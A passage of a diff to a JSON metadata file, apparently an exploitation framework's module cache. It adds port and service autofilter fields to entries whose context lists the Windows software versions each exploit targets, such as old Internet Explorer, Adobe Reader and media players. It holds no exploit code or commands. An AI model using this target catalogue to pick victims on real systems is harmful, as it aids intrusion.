[ + + ], "targets": [ "Windows x86/x64" ], @@ -67289,6 +88453,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 8 on Windows 7 SP1" ], @@ -67326,6 +88496,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3", @@ -67365,6 +88541,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -67400,6 +88582,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 8 on Windows XP SP3" ], @@ -67436,6 +88624,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 7 on Windows XP SP3", @@ -67475,6 +88669,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP with IE 8" ], @@ -67512,6 +88712,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP1 / IE 10 / FP 12" ], @@ -67545,6 +88751,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -67588,6 +88800,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP", "Windows 7" @@ -67622,6 +88840,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 10 with IE 11" @@ -67659,6 +88883,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" ], @@ -67692,6 +88922,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -67732,6 +88968,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -67774,6 +89016,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2/SP3 Pro English (IE6)" ], @@ -67807,6 +89055,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -67840,6 +89094,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0/SP1 Pro English", "Windows 2000 Pro English All" @@ -67879,6 +89139,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -67915,6 +89181,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -67956,6 +89228,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -67990,6 +89268,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "iPrint 5.30 Windows Client" ], @@ -68023,6 +89307,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68057,6 +89347,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68090,6 +89386,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68127,6 +89429,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68161,6 +89469,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "iPrint 5.30 Windows Client" ], @@ -68196,6 +89510,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68238,6 +89558,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68278,6 +89604,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68316,6 +89648,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68352,6 +89690,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -68385,6 +89729,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-SP2" ], @@ -68420,6 +89770,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VMWare OVF Tools 2.1 on Windows XP SP3" ], @@ -68456,6 +89812,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Internet Explorer 6 / Internet Explorer 7" ], @@ -68488,6 +89850,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -68524,6 +89892,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68564,6 +89938,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -68600,6 +89980,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "RealPlayer SP 1.0 - 1.1.4 Universal", "RealPlayer 11.0 - 11.1 Universal" @@ -68635,6 +90021,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English" ], @@ -68668,6 +90060,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE / RealOne Player 2 (6.0.11.853)", "IE / RealPlayer 10.5 (6.0.12.1483)" @@ -68705,6 +90103,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 6 on XP SP3", @@ -68740,6 +90144,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "RealPlayer 10/8 on Windows 2000 SP0-SP4 English", "RealPlayer 10/8 on Windows XP PRO SP0-SP1 English" @@ -68774,6 +90184,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" ], @@ -68807,6 +90223,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -68842,6 +90264,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68876,6 +90304,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Samsung Security Manager 1.32 & 1.4 Universal" ], @@ -68909,6 +90343,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68942,6 +90382,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68983,6 +90429,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -69016,6 +90468,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 6 / Windows XP SP2 Pro English" ], @@ -69049,6 +90507,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69082,6 +90546,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -69114,6 +90584,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69148,6 +90624,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English" ], @@ -69183,6 +90665,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 English", "Windows XP SP2 Universal", @@ -69219,6 +90707,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 7 on Windows XP SP3", @@ -69254,6 +90748,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69287,6 +90787,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP0-SP3 (IE6/IE7)", @@ -69326,6 +90832,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -69364,6 +90876,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -69397,6 +90915,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 Pro English" ], @@ -69430,6 +90954,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal vcst_eu.dll", "Windows 2000 Pro English", @@ -69469,6 +90999,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69503,6 +91039,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -69541,6 +91083,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -69575,6 +91123,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -69610,6 +91164,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows IE6-7", @@ -69646,6 +91206,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 6 on XP SP3", @@ -69686,6 +91252,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 6 on XP SP3", @@ -69722,6 +91294,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69764,6 +91342,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -69800,6 +91384,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69834,6 +91424,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Winamp 5.12 Universal" ], @@ -69867,6 +91463,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Winamp 5.24" ], @@ -69900,6 +91502,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English ALL", "Windows XP Pro SP0/SP1 English" @@ -69934,6 +91542,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7" ], @@ -69972,6 +91586,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows Universal", @@ -70007,6 +91627,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -70041,6 +91667,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English SP4", "Windows XP Pro SP2 English" @@ -70076,6 +91708,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 Pro English" ], @@ -70108,6 +91746,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0/SP1 Pro English", "Windows 2000 Pro English All" @@ -70142,6 +91786,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -70178,6 +91828,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -70214,6 +91870,12 @@ "platform": "Windows", "arch": "", "rport": 135, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT SP3-6a/2000/XP/2003 Universal" ], @@ -70248,6 +91910,12 @@ "platform": "Windows", "arch": "", "rport": 2103, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 ALL / Windows XP SP0-SP1 (English)" ], @@ -70283,6 +91951,12 @@ "platform": "Windows", "arch": "", "rport": 0, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)", "Windows 2000 Server SP0-SP4+ English", @@ -70326,6 +92000,12 @@ "platform": "Windows", "arch": "", "rport": 2103, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Server English" ], @@ -70363,6 +92043,18 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic", "Windows XP SP2 user32.dll 5.1.2600.2622", @@ -70409,6 +92101,18 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic" ], @@ -70444,6 +92148,18 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic" ], @@ -70477,6 +92193,12 @@ "platform": "Windows", "arch": "", "rport": 41025, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EMC AlphaStor 3.1" ], @@ -70513,6 +92235,12 @@ "platform": "Windows", "arch": "x86", "rport": 3000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EMC AlphaStor 4.0 < build 800 / Windows Universal" ], @@ -70549,6 +92277,12 @@ "platform": "Windows", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EMC Networker 7.6 SP3 / Windows Universal", "EMC Networker 7.6 SP3 / Windows XP SP3", @@ -70587,6 +92321,12 @@ "platform": "Windows", "arch": "x86", "rport": 6542, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EMC Replication Manager 5.2.1 / Windows Native Payload" ], @@ -70622,6 +92362,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -70655,6 +92401,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1" ], @@ -70689,6 +92441,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ACDSee FotoSlate 4.0 Build 146" ], @@ -70722,6 +92480,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ACDSee 9.0 (Build 1008)" ], @@ -70757,6 +92521,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1" ], @@ -70789,6 +92559,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -70822,6 +92598,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)" ], @@ -70858,6 +92640,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -70896,6 +92684,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -70932,6 +92726,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -70968,6 +92768,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows Universal (JS Heap Spray)" ], @@ -71003,6 +92809,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Universal (JS Heap Spray)" ], @@ -71038,6 +92850,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -71074,6 +92892,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v9.0.0 (Windows XP SP3 English)", "Adobe Reader v8.1.2 (Windows XP SP2 English)" @@ -71113,6 +92937,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)" ], @@ -71149,6 +92979,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows English (JS Heap Spray)", "Adobe Reader Windows German (JS Heap Spray)" @@ -71187,6 +93023,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)" ], @@ -71223,6 +93065,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader <= v9.3.3 (Windows XP SP3 English)" ], @@ -71263,6 +93111,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3" ], @@ -71301,6 +93155,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP / Adobe Reader 9/10/11" ], @@ -71335,6 +93195,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows Universal (JS Heap Spray)" ], @@ -71368,6 +93234,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v8.1.2 (Windows XP SP3 English)" ], @@ -71409,6 +93281,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ " ALLPlayer 2.8.1 / Windows 7 SP1" ], @@ -71443,6 +93321,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal Salamander 2.5" ], @@ -71479,6 +93363,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "AOL Desktop 9.6 on Windows XP SP3", "AOL Desktop 9.6 on Windows XP SP3 - NX bypass", @@ -71514,6 +93404,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" ], @@ -71549,6 +93445,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 with DEP bypass" ], @@ -71587,6 +93489,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Quicktime 7.7.0 - 7.7.3 on Windows XP SP3" ], @@ -71625,6 +93533,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "QuickTime 7.7.1 on Windows XP SP3", "QuickTime 7.7.0 on Windows XP SP3", @@ -71661,6 +93575,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1" ], @@ -71695,6 +93615,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -71729,6 +93655,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -71760,6 +93692,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -71793,6 +93731,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Aviosoft DTV Player 1.0.1.2" ], @@ -71828,6 +93772,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 English", "Windows 2000 SP4 English" @@ -71862,6 +93812,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)" ], @@ -71896,6 +93852,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BlazeVideo HDTV Player Pro v6.6.0.3" ], @@ -71933,6 +93895,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BlazeDVD 6.2", "BlazeDVD 5.1" @@ -71967,6 +93935,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Boxoft WAV to MP3 Converter v1.1" ], @@ -72002,6 +93976,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -72035,6 +94015,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP", "Windows 7" @@ -72070,6 +94056,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)" ], @@ -72104,6 +94096,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 English", "Windows XP SP0/1 English", @@ -72139,6 +94137,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "CCMPlayer 1.5" ], @@ -72177,6 +94181,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1" ], @@ -72213,6 +94223,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Cool PDF 3.0.2.256 / Windows 7 SP1 / Windows XP SP3" ], @@ -72248,6 +94264,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Corel PDF Fusion 1.11 / Windows XP SP3" ], @@ -72284,6 +94306,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Csound 5.15 / Windows XP SP3 / Windows 7 SP1" ], @@ -72318,6 +94346,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "CuteZIP 2.1 / Windows Universal" ], @@ -72356,6 +94390,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows x64", @@ -72394,6 +94434,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "CyberLink Power2Go 8 (XP/Vista/win7) Universal" ], @@ -72428,6 +94474,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Cytel 